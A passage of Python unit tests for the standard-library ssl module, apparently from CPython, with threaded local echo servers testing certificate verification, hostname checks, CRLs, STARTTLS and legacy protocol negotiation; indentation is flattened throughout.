def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
